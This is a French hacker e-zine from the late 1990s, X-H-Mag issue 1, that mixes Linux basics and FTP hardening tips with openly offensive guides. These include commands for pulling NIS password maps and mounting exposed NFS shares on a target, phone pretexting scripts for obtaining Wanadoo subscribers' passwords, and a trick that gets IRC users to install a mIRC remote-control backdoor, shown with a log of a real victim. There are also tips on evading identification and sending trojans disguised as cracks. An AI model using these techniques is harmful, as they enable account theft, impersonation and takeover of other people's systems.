Copy Link
Add to Bookmark
Report
X-H-Mag Issue 1
X================X
+ X-H-Mag I +
+ TexT version +
X================X
I . Disclamer : bon alors TOUTES les information contenue dans cet E-Mag n'y sont qu'a
titre informatif, éducatif, indicatif et dans le cadre de la liberter d'expression dans
les pays démocratique donc c'est a vous d'aller vérifier si vous avez le droit de lire
se document...Et nous (moi et les autres membres) ne sommes pas responsable de se que
vous ferez de ses informations (si vous les utiliser mal et que vous allez en prison
c'est pas notre faute...). Donc vous n'avez pas le droit d'utiliser les techniques de
hack expliquer ici (sauf si c'est legale dans votre pays) et bla bla bla je pense que
vous avez compris (si vous avez un QI de plus de 45 ;)...
II . Introduction : je vais vous expliquer ici mon but et celui de du groupe.
Personnellement je trouve que l'underground informatique français est MORT y'a plus
que des lamez sous windows qui nuke plus vite que leur P300 =) . J'ai aussi
remarquer que "l'esprit" des hacker n'existe plus. Si sa continue comme sa
les mec de la DST auront plus de travail!! =) Donc on va essayer de vous
expliquer des technique qui fonctionne encore de nos jours (je dis pas que se
sera forsement encore valable quand vous lirez ça...). Donc voila vous savez
pourquoi on a écrit sa... Now place au zine.
III . Présentation : on va se décrire chacun vite fais modestement ;) enfin que vous
situez mieux qui qu'on est, ce que l'on veut, nos mails, n° de carte bancaire, enfin tout
d'interessant quoi !
RiTuaL : ritual@caramail.com
-vu par KayN : adepte de la souflette, il adore la fumette
-vu par Killer : Un malade de linux, bon copain et pi bon redacteur
-vu par lui : heu je sais pas moi ! ;)
(NdRiTuaL : KayN comme c'est poetique !)
Killer : o_killer_o@hotmail.com
-vu par KayN : efficace, présent, retardé (7h) et linuxien à donf !
-vu par RiTuaL : c un mec cool comme y devrais en avoir plus, linuxien
-vu par lui :
Ben en fait KayN et RiTuaL me decrivent bien.
KayN : kayn@caramail.com
-vu par RiTuaL : Comme moi plus souvent defoncer qu'en état normal!!=)
-vu par Killer : KDE c sa vie, son PC sa raison, son sujet du bac c son papier PQ.
-vu par lui : je me justifierais par ma citation préférée :
Quand tu as envie de travailler, dors jusqu'a ce que ca passe
Shirker: il ne veux pas etre membre mais juste ecrire un article de temps en
temps
(NdKiller: mais c un mec bien)
Vous pouvez visiter notre sitre web : www.multimania.com/xhacker
X===========X==========X
+ 0 . Index + X-Hacker +
X===========X==========X=================X============X
+ Nom de l'article + auteur +
X========================================X============X
+0 . Index + X-Hacker +
+1 . Linux pour les Newbies + RiTuaL +
+2 . NIS + KayN +
+3 . Hack les pages perso Wanadoo + RiTuaL +
+4 . Social engineering + RiTuaL +
+5 . Securite des FTP anonyme + Killer +
+6 . Services linux + Killer +
+7 . Network File System + KayN +
+8 . L'exploit Sendmail 8.8.4 + Shirker +
+9 . Effacer ses traces + RiTuaL +
+9 . + & killer +
+10. Connection a internet sous linux + N@-Z +
+11. Lamer's trip + KayN +
+12. Delire and drugs + X-Hacker +
+13. Nos projets + X-Hacker +
+14. Mot de la fin ... + RiTuaL +
X========================================X============X
X============================X========X
+ 1 . Linux pour les Newbies + RiTuaL +
X============================X========X
Bon alors pour cet article je pars du fait que vous savez installer linux (et
qu'il est installer sur votre ordi). Donc je vais expliquer ici les commande
de base (meme si on trouve sa dans plein d'autre E-Mag ) le fonctionnement
des alias, et comment se connecter a internet (avec X-Window,Red-Hat 5.x ou +)
-> Les commande de base
cd : pour monter dans l'arboraissance : cd nom_du_rep ou pour descendre :
cd ..
rm : pour supprimer un fichier : rm nom_du_fichier ou un rep : rm -d nom_rep
ps : c'est le progress status sa montre les prog lancer et donne le pid pour
faire un kill
cp : copie un fichier : cp fichier /dir_ou_tu_veux_copier
mv : deplacer un fichier ou renomer : mv fichier /dir_ou_tu_veux_deplacer_le_fichier
ou nouveau_nom
ls : comme dire sous DOS, permet ausi de voir les permition de fichier : ls -l
pour les fichier cacher : ls -a comme all (les fichier cacher on un .
devant leur nom : .fichierCacher)
su : pour se loger en simple user : su nom_d'un_user , su - user (vous place
place dans le Home/nom_user quand vous ete loger)
./ : pour executer un prog (qui est dans le rep courant) :
./nom_d'un_programme
df : pour voir la place qui reste sur le HD.
cc : pour compiler un programme en C : cc fichier.c -o nom_du_prog
gcc : idem : gcc fichier.c -o nom_du_prog
g++ : idem : g++ fichier.c -o nom_du_prog
dir : comme sous dos
pwd : montre ou tu te trouve dans l'arboraissance ex : /etc/X11/xinit/
tar : pour detarer un fichier : tar xvf fichier.tar
tarer un rep en tar.gz : tar cvfz nom_fichier.tar.gz nom_du_rep
man : permet d'avoir de l'aide sur certain programme : man nom_prog (exemple :
man gimp)
gzip : pour "deziper" ou ziper les fichier *.gz *.tgz : gzip -d fichier.gz ou
tgz (pour deziper) pour ziper gzip fichier_a_ziper
find : pour trouver un fichier dans le repertoire courant :
find nom_du_fichier
exec : pour lancer un prog de n'importe ou dans l'arboraissance :
exec /root/programme
rwho : donne les user connecter
kill : pour killer un prog il faut son numero pid (avec ps) puis : kill 459
par exemple
date : te donne la date
grep : pour rechercher du texte dans un fichier : grep texte nom_du_fichier
type : pour retrouver un programme ex gimp : type gimp sa repond : gimp is
"/usr/bin/gimp"
mail : pour verifier si t'as du courrier(en reseau interne) pour + d'info
mail --help
make : je voix pas trop comment decrire cette commande mais bon elle sert
surtout a installer des prog (make install) ou pour reconpiler le
noyau (make xconfig) enfin bref sinon y'a aussi : make clean qui sert a
effacer les fichier temporaire laisse par un(ou +) processus de
compilation... sinon y'a make dep make menuconfig etc ... si vous
voulez + d'info mailer moi. (pour make xconfig et make menuconfig il
faut etre dans le rep /usr/src/linux)
halt : pour eteindre votre PC
alias : pour crée un alias "temporaire" ex :
alias ls="ls --color=tty -F -b -T 0" donc now tant que tu redemare pas
ton ls est en couleur ...
(bien que ls --color suffise)
write : pour chater avec un user connecter : write nom_user (control D
pour stoper le prog)
unzip : pour deziper des fichier .zip : unzip fichier.zip
rmdir : effacer un repertoire (faut qu'il soit vide) : rm rep_a_supprimer
mkdir : pour crée un repertoire : mkdir nom_du_rep_a_crée
chmod : pour changer les permition des fichiers ou repertoire mais j'ai pas
envie de me faire chier a vous expliquer ça alors faite :
chmod --help ou man chmod bien que se ne soit pas trop explicite
enfin on veras pour expliquer mieux la prochaine fois...
clear : comme cls sous dos efface l'écran
mount : pour monter un lecteur CDROM, FLOPPY ou bien les partition windows
:(par default dans /mnt ex : mount cdrom)
umount : pour demonter un lecteur : umount cdrom
uname -a : pour connaitre la version de ton noyau
finger : donne des info sur le proprio d'une IP : finger @Ip_du_serveur
(si il est sous UNIX/LINUX et si il a activer cette fonction)
--help : pour avoir de l'aide sur une commande : commande --help
(ex : ls --help)
whoami : pour voir avec qui vous ete connecter
startx : lance l'interface X-Windows
useradd : pour rajouter un user a votre system : useradd RiTuaL
userdel : pour supprimer un user : userdel RiTuaL ou userdel -r RiTuaL
(efface le repertoire avec)
shutdown : pour rebooter ou eteindre le pc : shutdown - r now pour rebooter
shutdown -h now pour eteindre le pc.
Voila pour les commande de base en passant une astuce : quand tu fait un dison
mail --help si tu fait mail --help>nom_de_fichier sa te copie le texte d'aide
dans nom_de_fichier... Et si tu fait mail --help>>nom_d'un_fichier sa rajoute le
tout a la suite du fichier deja existant...
On vera d'autre commande dans le nr 2 .
-> Les Alias
Les Alias c'est quoi??? C'est un peux comme un racourcis vers une commande ...
Un peut comme dans un script mIRC ... Bon je peux pas mieux expliquer donc
je vais vous mettre un exemple de fichier bashrc :
(Les alias sont contenue dans /etc/bashrc c'est pas trop dur d'en cree un
nouveau...)
# /etc/bashrc
# System wide functions and aliases
# Environment stuff goes in /etc/profile
# For some unknown reason bash refuses to inherit
# PS1 in some circumstances that I can't figure out.
#Putting PS1 here ensures that it gets loaded every time.
PS1="[\u@\h \W]\\$ "
alias which="type -path"
alias ..="cd .."
alias ...="cd /"
alias cd..="cd .."
alias cls="clear"
alias cdrom="cd /mnt && mount cdrom && cd cdrom"
alias ucdrom="cd /mnt && umount cdrom"
alias floppy="mount floppy && cd floppy"
alias x="startx"
alias dtar="tar xvf"
alias ungz="gzip -d"
alias reboot="shutdown -r now"
alias off="shutdown -h now"
# PATH (avec KDE)
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:/opt/kde/bin
( ndKayN: tu peux mettre "." dans le path aussi, comme ca tu tape "configure"
à la place de "./configure". non je suis pas fainéant! c pratique c tout! ca fais gagner
du temps, et pis j'ai pas d'explications à donner. je vais me rendormir :) )
( ndRiTuaL: heuu ou je t'ai mal piger ou se que tu insite les gens a faire
c'est de les aider a se faire hacker ... Si y'a un . dans le PATH sa peut etre
utile pour les backdoor...(style tu fait un prog ls et quand le mec tape ls
ben sa look d'abord si le prog est pas dans le rep courrant... voila c'est dit)
etc......
J'éspère que vous avez compris comment sa fonctionne là j'ai mis des exemples
simple pour que vous compreniez bien ;)
-> Connection a internet avec X-Window
Bon je vais vous expliquer comment vous connecter a internet avec X-Windows
(sur la Red-Hat). Loger vous en root puis aller dans le control-panel
(si il est pas ouvert tapez control-panel dans un xterm) puis sur configuration
reseau dans interfaces faite ajouter, une PPP puis vous mettez le numero de
telephone a appeler votre identifient de connection et enfin votre pass.
Ensuite faite configurer et la :
Dans materiel tu mets : Utiliser le control de flux hard et les ligne modem
et Autoriser tout utilisateur a activer.désactiver l'interface .
Dans vitesse de ligne : 115200
Port du modem : /dev/modem
Dans Réseau :
Tu mets Fixe la route par default à la connexion (defaultroute)
Puis dans Adresse IP distante tu mets l'IP de ton serveur
Et dans Adresse IP local tu met rien si ton IP est dynamique sinon tu met l'IP
que ton serveur t'as atribuer..
Si sa marche pas y'a 2 possibiliter :
- tu l'enlève(la connexion PPP) et tu refait tout mais quand tu mets le nr de
phone a appeler ton identifiant tu coches : utiliser autentification PAP
- sinon faut que tu reconfigure ton noyau ... Mais sa on vera dans le prochain
mag
Si vous voulez d'autre info sur comment se connecter a internet avec linux
allez voir l'article de N@-X : Connection a internet sous linux ...
___________ _
_______ \____ ____/ | |
| \ _ | | _ _ ______ | |
| |__ / | | | | | | | | / __ \ | |
| __ / | | | | | | | | | __| | | |
| | \ \ | | | | | |__| | | __ | | |______
|_| \_\ |_| |_| |______| |_| |_| |________\
(ndRiTuaL : tient aucun commantaire sur mon zoli n'ascii enfin pour le
momment ;) )
Je voulais mettre sa dans le 2em nr mais comme on a deja mis du temps a faire
celui la je le met ici (quand on sais pas quoi faire on s'amuse de peux...)
EliTe GreEtZ : [UtopiA] : "sa m'énerve un hacker..."
fluffy ou lindros : "ha bha ouais!"
Shirker : T'as vu ta facture FT HAHAHAHA! Avril-Mai 1999 !!!
Sickander : "tout elite et tout"
adrien : c'est un futur scénariste lol ;)
KayN : roule toi un cône sa ira mieux ;)
killer : une tortue ecrit plus vite que toi(article);)(humour)
SPOOKY : un mec sympa...
ToURisT : qui fume de la beu en regardant la mer ,) ...!
Tout ceux que je n'ai pas siter : desoler ;)
("..."=phrase répeter + de 5 fois dans la journée)
Ne chercher pas a comprendre sauf si vous ete l'une des personnes que je vise
(sauf peut etre fluffy paskill comprend pas tout...)
X=========X======X
+ 2 . NIS + KayN +
X=========X======X
X X <- j'avais fais un bo dessin
X mais il a foiré à la mise en page (merci ritual...)
X X
(NdRiTuaL : tu vas pas laisser cette merde !??)
(NdKayN : tu fais jamais de conneries quand t'est défais ? )
(NdRiTuaL : ben dans se cas je ferais que des conneris ! ;)
(NdKiller : Rien a dire,)
Lu à toi qui lis not mag et qui recherche la connaissance et non pas la
destruction (ca la fais un peu a la grand chef indien, bien que je prefere
les indiennes avec les copains l'été, le soir, mais je m'égare). Voici un
petit texte sur le NIS et des ses bugs (faites moi connaitres les aut merci:)
Pour comprendre fo avoir linux, s'y connaitre un peu, et surtout pas etre con.
Y te faudra donc : un cerveau, un pc, des doigts pour tapauter sur le
clavier, mais surtout Linux; ceux qui ont winblows, vous savez ce qui vous
reste à faire.
D'abord NIS c un service UNIX, qui permet des utilisateurs
autorisés de se logger sur une machine en rezo. Toi tu te log sur la machine
LUKE et la machine SOLO (toute ressemblance avec des personnes ayant existés
dans un film de Lucas ne serait presque pas fortuite) gére le NIS. Voilà donc
le /etc/passwd sur LUKE :
#/etc/passwd
root :VcDtfTeRTTt45 :0 :1 :ze boss:/:/bin/sh
bin :* :1 :1 ::/usr/local/bin/noshell
gege :100 :501 : local user:/home/gege:/bin/sh
+foo
Pour les connaisseurs des fichiers passwd d'unix, vous avez peut etre remarqué
+foo qui est inhabituel. Ben voilà, c l'user ki est géré par NIS, donc pas un user
en local. Donc le prog de login qui est sur LUKE (o- tu viens de te logger) va demander
à SOLO si ton nom de domaine est autorise (donc toi, chuis bon nan ?).
(ndRiTuaL: heu je pense que les connaisseurs de passwd UNIX save pkoi y'a un +foo ;))
Le prog regarde la " carte NIS ", en gros, c une sorte de passwd :
YODA:F45SdGhhIk.:234:789:yoda the jedi master:/home/yoda:/bin/sh
Foo:3DKF9kApLWx:233253:evil hacker:/home/foo:/bin/sh
Donc voilà t identifié et pis t'a tes autorisations et etc comme sur une machine locale.
On va voir maintenant ce qu'on peut s'amuser à faire :
D'abord faire un petit rpcinfo :
rpcinfo -p www.victim.com
program vers proto port
100004 2 tcp 673 ypserv
100005 1 udp 721 mountd
100003 2 udp 2049 nfs
100026 1 udp 733 bootparam
Et là OH ! Miracle ! y'a ypserv ce qui inclus qu'y a NIS.
C bien beau ca mais si t'a pas le nom de domaine de la machine, tu va pas aller loin.
Pour ca y'a ypwhich :
ypwhich -d victim www.victim.com
solo.victim.com
C'est donc SOLO qui gére le NIS et en plus ca te prouve que victim est le nom de domaine du
NIS. Et maintenant t'a juste à recup le fichier passwd.byname . C'est le fichier qui gére le
NIS. Et pour ca tu utilise ypx (peut etre avec le mag, sinon tu cherche, t majeur, non?;
nan !!!!!!!!!? c jeunes délinquants, c pas possible! mais que vont devenir nos pov retraités qui
nous taxent tout nos tunes!!) Tu tape alors :
ypx -d solo.victim.com victim -m passwd.byname
Pis la t'a le fichier et pis je te laisse le cracker tout seul comme un grand.
Bon en admettant que t'as pas le nom de domaine, il te reste une possibilité :
un petit showmount :
xhacker% showmount -e www.victim.com
...
/var (everyone)
...
Donc tu peux mounter /var chez toi comme ca :
% mount -t nfs www.victim.com:/var /mnt
Ensuite tu vas dans /mnt/yp et tu trouve un petit fichier à cracker encore tout seul. C du
boulot !
Bon voilà, c'est fini. Je vous laisse imaginer toutes les actions possibles et les suites.
C'a été TRES rapide et vraiment PAS détaillé. Je me suis bcp inspiré d'un fichier ecris par
je sais plus qui et je sais plus où, donc aucun mérites me revient, m'enfin vous pouvez tjs
me remercier ;) Désolé pour les endroits où je suis parti en délire, j'ai du mal à me controler
@ bientôt
X==================================X========X
+ 3 . Hack les pages perso Wanadoo + RiTuaL +
X==================================X========X
Hehehe Wanadoo arf France Telecom............
Bon venons en au fait comment hacker les page web de Wanadoo..?
Nan je vais d'abord vous donner un conseil (enfin c'est pour si vous aimer pas
voir des mec en bleu venir cher vous ;) : si vous hacker une page perso wanadoo
et que le proprio de la page réclamme chez FT bha y vous regarder qui s'est
connecter il auront ton IP et ton nr de telephone....Donc ton nom adresse etc..
Donc je vous conseille de la faire depuis un cyber cafe ou en spoofant...
Sinon je vous conseille de faire des hack cacher (juste un lien vers une page
que vous aurez rajouter ..)
Donc pour hacker un page wanadoo vous avez besoin de :
- Le nom du mec
- Le prenom du mec (si c'est pas sur sa page looker sont E-Mail a wanadoo
c'est souvent : Prenom.Nom@wanadoo.fr)
- heuu un telephone
-> Donc la technique (trop facile (normal t'as le verre tigre =)) :
Vous prennez un telephone vous numerotez : 08.03.83.33.13 (c'est l'assistance technique
de wanadoo...) Puis vous trouvez une excuse du style que vous avez planter tout votre
system et que vous venez de tout réinstaller et que vous ne trouver plus votre
feuille d'abonner wanadoo... Donc si tous se passe bien le mec vous donne les
info nom d'utilisateur + pass + pass messagerie (je croit que le pass de la
page web est celui de la messagerie... (par default..))
Donc vous voila en possession d'un compte internet et de la page perso =)
(Si c'est pas le bon pass retelephoner a wanadoo insister sur le fait que t'a
deja phoner et que l'autre t'a pas filer le pass de la page web...sinon
demander le pass en meme temps que toute les autre info...)
-> Quelque senario :
Vous avez besoin de :
- un telephone
- votre (ou une) meuf
Donc si votre meuf a pas une vois de gamine de 13 ans sa devrais aller...
Donc idem vous telephoner a wanadoo au tel indiquer + haut et vous dite a la
meuf de se faire passer pour la femme du mec ... Elle doit dire qu'elle a
planter la connection internet de son mari et qu'elle ne trouve pas la feuille
d'abonner pour tout reconfigurer (elle dois aussi demander comment faire ça)
Donc se scénario est + long mais y marche mieux...
A vous de l'améliorer...
Encore un autre scénario :
Appelez d'une cabine et faite croire que vous devez envoyer un mail très très
urgent et que votre fils (crétin qu'il est) a planter votre portable il y a 2 jours
et vous n'avez pas penssez a refaire votre connection internet et la vous ete dans la
merde faite sentir au mec que c'est très important pour vous d'envoyer se courrier bon!
je m'arrete la mais je pense que vous avez compris ...
-> Astuce :
Au fait pour avoir des info sur le mec faite connaissance avec lui... Si vous avez pas
son nom mailer lui que vs aimez son site et que vous voulez le renontre sur IRC, IQC, et
si il accepte ben allez y demander lui ou il habite et dite lui que vous habiter dans le
coin et que vous pourriez aller chez lui (comme sa il vous donne son adresse hehe) sinon
parler musique et proposer lui de lui envoyer un CD de votre composition (la aussi tu
resoit son adresse ;) demande lui son age aussi et sa profession si il travaille et sinon
celle de son père... Comme ça t'as toute les info qui te faut (pour si le mec de
l'assistance technique te pose trop de question ou si il a du mal a trouver le dossier
de votre victime .)
Tué une personne dans la rue : vous serez un assassin, tué cette même personne
pendant une guerre : vous serez un héro...
RiTuaL
X========================X========X
+ 4 . Social engineering + RiTuaL +
X========================X========X
Le social engineering tout le monde connais.(sauf si vous ete vraiment con...)
Je vais vous expliquer comment faire accepter un fichier a qq'un sur IRC...
Ou comme l'exemple cidessous lui faire mettre une BackDoor dans son script
Les mec les plus facile a avoir c'est les newbies de l'IRC (heu nan sa depend
du server si vous aller sur un server ou y'a que des hackers c'est pas la
penne) mais si vous aller sur dalnet dans #france hehe...
( NdKayN: si vous allez sur irc.funradio.fr , essayez de voir un certain
"blackbird" je vous parie que ca marche, y'a pas + con ! )
( NdKiller: Sur fun, ya preske ke ca des gens komme ca mais bon, j'ai vu
pire!_)
Ma technique preferer est de parler au mec quand il me pose une question je
lui répond 30seconde je surfe. Ensuite je repond a sa question puis je lui
dit : "Je viens de lire un truc sa fait peur...!"
Le mec repond naturellement (si il est pas dans une autre discution)
"Quoi??"
Alors moi je lui dit (meme si y repond pas quoi) :
"N'importe qui peux penetrer sur ton HD a cause d'un bug dans mIRC"
Ne pas lui laisser le temps de répondre et lui dire :
"y'a aussi un truc pour se proteger ..."
attendre 5 seconde :
"attend je me protege"
Si le mec te crois il te demande :
"comment on fait??"
Et la c'est gagner (sauf si le mec connais le truc)
"Tu va dans ton remote et tu ecrit : CTCP 1:REMOTE: /$$2- en 1er ligne"
Et alors t'as le control de son mIRC hehe tu tape (chez toi :
/ctcp nick_du_mec REMOTE action_a_effectuer(/nick autre_nick ;
/quit bon bye a tous et a demain sur #homo et #vrai_homme...)
Tu peux faire qu'il te mette un access dans son chan si il est op...
qu'il te voice, t'op qu'il kick qq'un ban etc...
J'ai pas tester mais pour le faire parler je croit qu'il faut faut un :
/notice #chan_ou_y_doit_parler texte... donc tu tape :
/ctcp nick_du_mec REMOTE /notice #bittos Salut les mec ;)
(comme ca tu peux avoir aussi les mec qui debute dans l'IRC, qui debute dans
le scripting etc...)Mais c'est pas la penne d'essayer dans #Hack etc... y'a
plein de lame ok mais bon y sont pas tous con a se point (quoi que je
l'ai deja fait et réussie sur un mec qui se prennait pour un big hacker...)
Comment faire accepter un fichier a un mec...?
C'est aussi facile qu'avant...
Y faut trouver un mec qui a besoin d'un prog (nukenabber,winnuke etc...)
alors tu lui send (dit lui qu'il teste sur toi si y veux le nuke, pis y va te
dire que le prog marche pas... alors tu lui dit que tu teste le tiens et idem
tu lui dit qu'il marche pas... mais propose lui en un autre qui marche et
voila) Alors la les meilleur chan c'est #crack etc meme #hack t'attend qu'un mec
veuille un crack et tu lui envoye un fichier avec le nom du crack le mec fera
meme pas gaffe...)
(En passant je tiens a remercier Utopiste pour son article dans FRhack nr1
donc j'utilise qqtruc comme exemple (la backdoor mIRC)...)
( NdKayN: euuh.. ben y'a toujours l'aut con de Blackbird sur irc.funradio.fr )
( NdRituaL : Il est si con que sa ??? gaiden est bien aussi non?)
Now quelque exemple de log (les miens) :
<RiTuaL> hey gaiden
<gaiden> salut comment on fait pour etre invincible sur IRC ???
<RiTuaL> arf pkoi tu veux etre invincible??
<gaiden> je veux plus me faire kicker de partout...
<RiTuaL> ha alors tu va dans ton remote et t'ecrit :
<RiTual> CTCP 1:REMOTE: /$$2- en 1er ligne puis en 2eme ligne :
<RiTuaL> on 1:kick:#chan :join #chan
/* comme j'utilise plus mIRC depuis longtemps (KVirc now)
je lui ai filler un truc au hazard (ne pas esiter a parler
compliquer moin y comprend mieux c'est */
<RiTuaL> c'est bon ??
<gaiden> ouais . maintenant je suis invincible ???
<RiTuaL> yep! =)
(Comme j'ai plus mIRC j'me suis trouver une lame dans #hackers et je lui ai
dit j'ai mis une backdoor a gaiden et je lui ai expliquer comment faire se
que je voulais faire... et voila )
(NdKayN: ben ca marche pareil les ctcp sous kvirc, nan ??? )
(NdRiTuaL : ben justement non c pour sa... sinon je serais en train de renomer gaiden la ;) )
(NdKiller : BitchX RUlEzZ/_)
(NdRiTuaL : Si tu le dit mais faut aimer le mode console (c comme surfer avec
lynx...)
X====X==========================X========X
+ 5. + Securite des FTP anonyme + Killer +
X====X==========================X========X
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------- F ------------------- T ------------ P ---------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
A N O N Y M E ------------- S E C U R I S E
Par Killer.
Introduction.
--------------
Qui suis-je? D'ou je viens, bien, tout cela a peut d'importance. J'essaye
simplement d'informer les gens sur les problemes et risques d'internet. Dans
cet article (qui est mon petit premier) je vais vous parler du FTP anonyme.
Nous allons, ensemble essayer de voir pourquoi il est redoutable et comment
faire pour le rendre moin dangereux.
Cet article est destine aux Admins des serveurs qui tournent un demon FTP.
Les particuliers qui veulent offrir des fichiers aux monde avec un FTPd (Pour
Windows ou LINUX). Il ce peut que les informations contenues ici, vous semblent
evidentes mais je tiens a ce que les gens qui ne le savent pas encore,
l'apprennent et l'applique.!
Voila, pour l'introduction.
Qu'est-ce qu'un serveur FTP?
----------------------------
Le serveur FTP est un type de serveur qui au lieu de vous offrir des
pages web comme les serveurs HTTP, vous offre une quantites d'archives
ou fichiers. Ces fichiers, sont possible d'etre downloader. Un serveur
FTP en parlant Hardware est concu sur les petits serveurs d'abort, d'une
machine qui est connectee a un reseau et qui tourne un petit programme
appele demon FTP (FTPD). Ce demon ecoute generalement le port 21 et attend
des connections de clients. Dans le cas de serveurs particulier, ce demon
peut tourner en meme temps que la personne surf sur internet ou tourne
aussi d'autres serveurs.
Dans le cas des grands reseaux, le serveur ftp est parfois meme un sous
reseau constitue de plusieurs machines toutes liees entre elles puis a une
qui tourne le demon FTP. Ceci est du a la plus grande anvergure du reseau.
*Comment se presente une aborescence de serveur FTP??
-----------------------------------------------------
Bien, un serveur FTP se presente de la forme suivante:
/ Repertoire racine (pour Linux /home/ftp/)
/bin Repertoire des binaries
/etc Repertoire des fichiers systeme (inclu passwd)
/lib Repertoire contenant certaines librairies
/usr Repertoire contenant les fichiers ayant rapport aux utilisateurs
/incoming Repertoire contenant des fichiers laisses par vos visiteurs
/pub Repertoire contenant les fichiers que vous offrez.
Pourquoi dois-je securiser mon FTP?
-----------------------------------
Un serveur FTP est une partie de votre machine a laquelle vous allez permettre
l'access externe de personnes parfois mal intentionnees, pour eviter que ces
personnes atteignent leut but, il est preferable de leur empecher certaines
formes d'access. Exemple: Sur d'anciens serveurs, la commande 'exec site'
permentait d'avoir un acces au shell.
Comme, si vous etes comme moi, vous aimez beacoup votre machine, vous allez
vouloir securiser au maximun ce FTP. Voila pourquoi nous parlerons de FTP
anonyme securise.
Que dois-je faire pour securiser??
----------------------------------
Pour securiser, je vous propose de suivre les quelques conseils qui vous
seront proposes maintenant.
- Il est tres important que l'utilisateur Root soit proprietaire de tous
les fichiers dans les repertoires de votre FTP. Pour verifier cela tapez
la commande:
ls -lR ~ftp | more
- L'utilisateur ftp pour se connecter n'a pas besoin de shell. Il est donc
possible de remplacer celui ci par /bin/false qui n'est pas un shell valide,
ceci evitera bien des intrusions. Pour effectuer cela tapez:
chsh ftp
Quand il vous est demande un nouveau shell, tapez:
/bin/false
Vous recevrez un message d'erreur, ignorez le.
- Comme vous ne voulez pas que les repertoires /, /pub, /usr, /lib puissent
etre modifiez, tapez:
chmod 555 ~ftp
chmod 555 ~ftp/usr
chmod 555 ~ftp/lib
chmod 555 ~ftp/pub
- Il est aussi recommendable de changer les modes des repertoires /etc, /bin et
ces fichiers en execution seulement pour eviter les abus, tapez pour cela les
commandes:
chmod 111 ~ftp/etc
chmod 111 ~ftp/bin
chmod 111 ~ftp/bin/*
- En ce qui concerne les fichiers du repertoire /etc, il est recommende de les
placer en lecture seule, en tapant:
chmod 444 ~ftp/etc/*
- Le repertoire /incoming est un repertoir ou les utilisateurs vous laisserons
des fichiers, il n'ont donc pas besoin de savoir ce qu'il contient ni d'en
effacer des fichiers, placez le pour cela en mode 1733 comme suit:
chmod 1733 ~ftp/incoming
- Le fichier des mots de passes qui se trouve dans /etc sous le mon de passwd
de votre ftp ne doit contenir aucun mot de passe encrypte, je vous recommende
de remplacer tous ces mots de passe par une *. IMPORTANT: l'utilisateur root
ne dois en aucun cas avoir un champ de mot de passe vide dans ce fichier,
replacer ce champ si il est vide par une *.
- Pour eviter que des utilisateurs creent les fichiers .rhosts et .forward, je
vous suggere de les creer vous meme et de les placer en mode de lecture seule,
comme il suit:
touch ~ftp/.rhosts
touch ~ftp/.forward
chmod 400 ~ftp/.rhosts
chmod 400 ~ftp/.forward
Et voila pour la securisation de votre FTP, je vous recommende tout de meme de
bien vous tenir au courant des nouveaux exploits qui sont decouverts mais aussi
de bien choisir le fichiers qui seront sur votre repertoire PUB.
Une bonne addresse pour les exploits est rootshell.
(ndRiTuaL : www.rootshell.com faut leur dire aller sur rootshell comme sa
si y on pas l'URL ben y son bon pour altavista ou yahoo nan ??;p)
(ndKayN : ouais mais rootshell c connu! débat sur rootshell à suivre ... ;)
(ndRiTuaL : tu sais y'a des perdu partout!!)
Voila, ce sera a peut pres tout.! Je tiens quand meme a dire que je n'ai ecris
ce document que dans un but d'ameliorer votre securite en ce qui concerne votre
FTP. Mais vous voyez ce que vous en ferez.
J'espere que vous avec aimez, suggerez moa des trucs pour des autres demons que
vous voulez securiser.
Pour tout ce qui est secu venez sur #Securoot (irc.funradio.fr) Cherchez soit
Kayn ou Killer ou mem n'importe kel op peut vs repondre.! (ndRiTuaL : hé moi ??!)
Allez a++ Sur IRC ou mem a ma boite E-Mail: o_killer_o@hotmail.com
Killer, sur irc.funradio.fr
When the night has something to say, you don't know what to do!
X=====X====================X========X
+ 6 . + Services linux + Killer +
X=====X====================X========X
Ben en fait, je savais pas trop sur koa vous ecrire et je pense que ke ne sais pas encore.
ya bien un truc ki est assez interessant. Sur les machines LINUX c'est les services.
Pourquoi quand j'installe, j'ai d'ofice HTTPD, FTPD, IMAPD et tous ces demons? Comment je
les enleve si je les utilise pas?
Hein? Moa j'ai pas envie de mettre des pages web sur internet et que les gens viennent
me faire chier sur mon FTP a essayer de trouver des trous de securite qui leur permettron
de foutre la merde sur mon PC! Comment je dois faire pour ne plus que ces 'services' se
lancent au demarrage???
Bon, ceci c'est la preocupation de la majorite des utilisateurs de LINUX sur internet.
Sur le #Securoot c'est le truc d'ont j'entend le plus parler et c'est le truc dont je
parle le plus. Voila. Ben en fait, les services. (Pas tous mais la plupart) ce sont des
demons. Cad des petits programmes qui se lancent en memoire et qui y restent. Essayer de
faire un ps -x vous verrez que vous avez surement la des lignes du style:
1 ? S 0:02 init[3]
2 ? SW 0.00 (kflishd)
3 ? SW< 0.00 (kswapd)
166 ? S 0:00 syslogd
175 ? S 0:00 klogd
187 ? S 0:00 inetd
Ben en fait, la majorite de ces programmes ce sont des demons. ceux ki ont
un ? dans le TTY. Il est possible de regler le nombre de ces programmes que
vous lancez. Pour la redhat, ces distributions assez populaires parke
faciles a utiliser et beucoup plus user friendly ke la slackware (ke je
prefere personnelement)
REDHAT
------
Pour cette version il vous suffir de lancer un script appele "setup".
La vous voyez apparaitre un truc pour setuper votre machine.
(NdRiTuaL :setuper t'a trouver sa ou ?? )
Allez avec vos doits sur le clavier jusqu'a ntsysv et vous appuyez dur enter.
Apres, vous verez une liste incroyable de services systemes. (Demons)
Appuyez sur F1 pour obtenir plus d'information sur un demon specifique.
Choisisez les demons que vous voulez lancer par une * dans la case a cote de
leur nom et ceux que vous ne voulez pas sans mettre un * a cote du nom.
Apres, dirigez vous sur OK Aprez ceci, vous revenez sur le menu central.
Appuyez sur F12 ou selectionnez quitter pour sortir. Voila pour quelques
demons, les autres je les mettrais dans le prochain X-Mag.
SlackWare
---------
Avec SlackWare, je vais vous expliquer petit a petit.
Choisissez votre editeur de texte favori. Identifiez vous en tant que root.
editez le fichier /etc/inet.conf
Voila. Le inetd est le demon qui se charge de lancer tous les services de base.
ici les demons sont places un par ligne.
Commentez les lignes de demons qui ne seront pas utilises!
Et puis apres vous envoyez un signar de SIGHUP au pid de inetd
exemple
kill -1 pid
Voila pour la slackware. Bon, dans le prochain numero! Je vous explique comment faire pour les autres service.
Je greet pour cet article: RiTuaL pour L'inspiration
KayN Pour sa participation sur #Securoot
(NdRiTuaL : et moi? (pour la 2ème fois !!)
Midnight_Chorus pour ses dessins
